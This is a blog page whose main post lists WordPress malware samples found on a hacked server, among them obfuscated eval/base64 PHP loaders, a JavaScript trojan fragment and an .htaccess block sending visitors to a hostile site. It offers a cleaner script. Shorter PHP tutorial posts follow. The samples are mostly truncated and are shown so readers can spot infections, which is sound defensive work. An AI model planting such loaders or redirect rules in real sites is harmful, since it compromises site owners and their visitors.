[Solve] WordPress Malware Script Attack Fix

Our server was hacked, and all PHP files were infected. The infected PHP file was injected with a malicious code / malware, see below, the code calls another PHP file and run it’s program. In order, to clean the files I need to removed the malware or malicious codes on each files. It is really frustrating if you have hundreds of infected files. so, what I did is, I created a script that will do that automatically.

List of Malicious Code / Malware Script that I have encountered so far:

A. c99madshell – this type of malware script has the ability to view your database and access your files, just like an admin. Below is the sample code:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

B. Trojan

<?php
...
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJj..."));
...

C. Trojan

<?php
if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='DTh0aDxGZzVodDE1Zzx4T19SQ1NfbEFKUnIrSjpxeGpqM2c1aHQxNTx4T19SQ1NfbEFKUnIrSjpxeDRuajt0MXRSWjVpPHhndFoySW0+UjVNTUtNWng0Tmo7NU1NS01STTUyS01pdDFkPE5qO2c1aHQxNTx4T19SU2JsOjBKUio6X0NsRzB4NHhNNWFLaTVSWndNdDJpUmFtd254ajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDU19sQUp4NGlNLTVqO2c1aHQxNTx4T19SU1BTRDpSQ1NfbEFKUkpscjp4NFdOVldOVm5wajtnNWh0MTU8eE9fUitDOlJTUFNEOlJDOl8qOl9sQXg0aU0tNWo7ZzVodDE1PHhPX1JTUFNEOlJDOl8qOl9sQVJKbHI6eDRXTlZXTlZucGo7aC0xd2l0SzF8T19Scm1kdHdDaU10MlpJbVpmNVo8JG1NTWozdGg8dFpSbU1NbT48JG1NTWpqMyRtTU05bU1NbT5SYW0yPCdPX1JybWR0d0NpTXQyWkltWmY1Wic0JG1NTWo7QjVJWjUzJG1NTTlaaU10MlpJbVpmNVo8JG1NTWo7Qk01aS1NMXwkbU1NO0JoLTF3aXRLMXxPX1JsMXRpPGozZzV...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}

D. Javascript Trojan

<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length

E. htaccess – The code below redirects your visitors to the hackers site (massage-pool.ru)

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php

F. Timthumb Vulnerability

This script basically use to crop and resize images, it used in most WP Premium themes, but hackers were able to find the vulnerability of this script and was able to do whatever they want, unfortunately, with the help of this script they can access your database to get important information, insert malicious codes in all of your php files, and even create another malicious php script, and can do a lot more.

Any timthumb.php or thumb.php file that is below 1.35 version is vulnerable I advice to update the file to 2.0 and up version.

Solution: Update your file here: http://timthumb.googlecode.com/svn/trunk/timthumb.php

G. class-wheel.php

As far as I decoded the file, the script sends important information of your server to thebestcache.com and then the script gets data from that server and then execute it. I think with this script the hacker can do whatever they want to do to your server just like on timthumb such as writes RewriteRule on your htaccess to redirect user to his/hackers site, insert malicious iframes, insert malicious javascript, and a lot more.

Solution: Delete this file immediately

Below is the snippet code of the script

<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...

H. god_mode_on

<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?>
<?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>

I. Trojan

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Most these attacks happens when you have old version of your programs – WordPress, Joomla, Timthumb, WP Plugins, easy ftp or sftp password, and infected computer can use your ftp as well. Make sure you have an updated version of your programs.

Download and Install
Downloand cleaner script below and put in on your root directory or any directory. This program will check all the PHP files and clean it if it’s infected with Malware code above.

Malware code keeps on coming back
If you remove malware code / malicious script successfully but if it still keeps on coming back. I suggest you to run malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and please send the scan result to info@php-beginners.com, we need to find file that causes the malware code / malicious script on coming back.

You can download two types of Cleaner script
Web browser and Shell Access version. You can use any of the two.

  • Download Cleaner 2.10 HTTP Version below and run it on your favorite browser.
    Example: http://www.yoursite.com/cleaner_2.10.php
    cleaner_2.10
    Title: cleaner_2.10 (9188 clicks)
    Caption:
    Filename: cleaner_2-10.zip
    Size: 2 KB

  • Download Cleaner CLI 2.10 Version below and run it using terminal or command line.
    Example: $ time php cleaner-cli_2.10.php 2>&1 >> cleaner_log
    The command above will run the cleaner-cli_2.10.php script and log the output to cleaner_log file.
    cleaner-cli_2.10
    Title: cleaner-cli_2.10 (4019 clicks)
    Caption:
    Filename: cleaner-cli_2-10.zip
    Size: 2 KB

Note:
Please don’t forget to create a backup of your wordpress files or /wp-content/ directory only. Use shell access to backup files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_directory.tar.gz] [directory]

[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./

This malware / malicious cleaner script works on all php programs, you can run it even if it’s a non-wordpress sites, but please create a backup of your files before you run the cleaner script, just to make sure you can recover it easily.

If you experienced any malware / malicious program that I don’t know, please let me know so that I can add it on the program. Thanks.

Posted in Uncategorized | 330 Comments

[Solved] Local PHP Date/Time is not working properly

I had a little problem running date(“F j, Y, g:i a”); function, it works fine at the first time but then I notice that it displays different time from my computer.

<?php
	echo date("F j, Y, g:i a");
?>

OUTPUT:

June 10, 2011, 9:35 am 

The correct output is June 10, 2011 5:30 pm but instead it’s 7 hours way behind.
Time and date is important in my program because I want to record when and what date-time user log-ins.

There are lots of ways on how to solve this kind of problem, but I’m going to show only 2 solutions by modifying .htaccess or php.ini. Since, I’m from Philippines I’ll be using “Asia/Manila” timezone.

1. Using .htacess:

php_value date.timezone "Asia/Manila"

2. Modifying php.ini

date.timezone = "Asia/Manila"

My timezone references are:
http://24timezones.com/
http://en.wikipedia.org/wiki/Time_zone

Posted in Uncategorized | 3 Comments

Stop Email Notification of WordPress Member Registration

Download, Install, and Activate the plugin.

Hope it helps. Thanks.

Stop Email Registration Notification

Stop Email Registration Notification
Title: stop-email-registration-notification (1165 clicks)
Caption: Stop Email Registration Notification
Filename: stop-email-registration-notification.zip
Size: 1 KB

Posted in Wordpress, WP Plugins | 2 Comments

What is a Database?

Database is used to store information like your customer’s information – first name, last names, email address, address, and etc… Database is very useful on a dynamic website (type of website that needs frequent change of content like news, e-commerce, blog, and etc…), because you can easily retrieve, save, update, and delete data.

Database is composed of tables. A Table is composed of rows of data just like what you see in your excel file. (See Image below)




The text in blue at the top of each column is called “field name“, in excel it is called column title. Field names are very important because these serves as the labels of your data, you cannot either create a table without “field names“.

Sample Situation

Suppose, we will store basic information of our client:

  • First Name
  • Last Name
  • Middle Name
  • Email Address

The first thing that we need to do is to create a database name “user” and a table name “user” having a field names of first_name, middle_name, last_name, and email. Our database structure would be the same as the image below.




As you can see on the image above, our database consist of 1 table that has field names and data in it.

I’ll teach you on how to create a database and table, on my next topic.

Posted in PHP Beginners Course, PHP Tutorial | 1 Comment

PHP Variables

Variables in any programming language are used to hold/store data such as String, Numeric (int, float, double), Array, or Objects.

$test_variable_name = "Paolo";
$counter = 10;

PHP variable is like an ice cream cone (see image below), the cone itself is the variable while the ice cream is the data. It can be in String, Numeric, Array, or an Object data-type.

PHP Variable Scope

This refers to where a variable is accessible in the script.

  • Global Variables – These type of variables can be access anywhere outside a function.
  • Local Variables – These type of variables can only be access only inside the function.

Diagram below shows the variable scope:

Declaring a Variable

We use (=) equal sign to assign a value to a variable.

$x = "value"; // String data-type. Variable $x has now a value of a string "value".
$x = 'value'; // String data-type. Variable $x has now a value of a string "value".

$x = "100";   // numeric data-type. Variable $x has now a value of numeric 100.
$x = '100';   // numeric data-type. Variable $x has now a value of numeric 100.
$x = 100;     // numeric data-type.  Variable $x has now a value of numeric 100.

$x = array(0 => 'value1',  "1" => 'value2'); // Array data-type.
$x = array("a" => array("k" => "v")); // multi-dimensional Array.

$x = false; // boolean
$x = true;  // boolean

$x = new ObjectName();	// Object

How to Declare a PHP Variable

  • A PHP variable must starts with dollar sign ($).
    • $varname
  • The first character of a PHP variable name must be underscore or letter.
    • $testname
    • $_test
  • PHP variable name will only contain alpha-numeric characters and underscore such as a-z, A-Z, 0-9, and _.
  • Invalid PHP variable names are:
    • $8thvar // starts with number
    • $a#rr // contains invalid character #

Sample Programs

1) This sample program will assign variables a value with String, Interger, and Float data-types.

<?php
$str = "Hello World!";
$int_sample = 4;
$float_sample = 8.25;

echo $str ."<br/>";
echo $int_sample . "<br/>";
echo $float_sample . "<br/>";
echo "int_sample + float_sample = " . ($int_sample + $float_sample);
?>

OUTPUT:

Hello World!
4
8.25
12.25

2) Sample program for global variable usage.

<?php
$name = "Nino Paolo Amarillento";

function myFunc(){
	$name = "Louellyn Bacalla";
}

echo $name;
?>

OUTPUT:

Nino Paolo Amarillento

3) Sample program for local variable usage.

<?php
$name = "Nino Paolo Amarillento";

function myFunc(){
	$name = "Louellyn Bacalla";
	echo $name;
}

myFunc();
?>

OUTPUT:

Louellyn Bacalla
Posted in PHP Beginners Course, PHP Tutorial | 1 Comment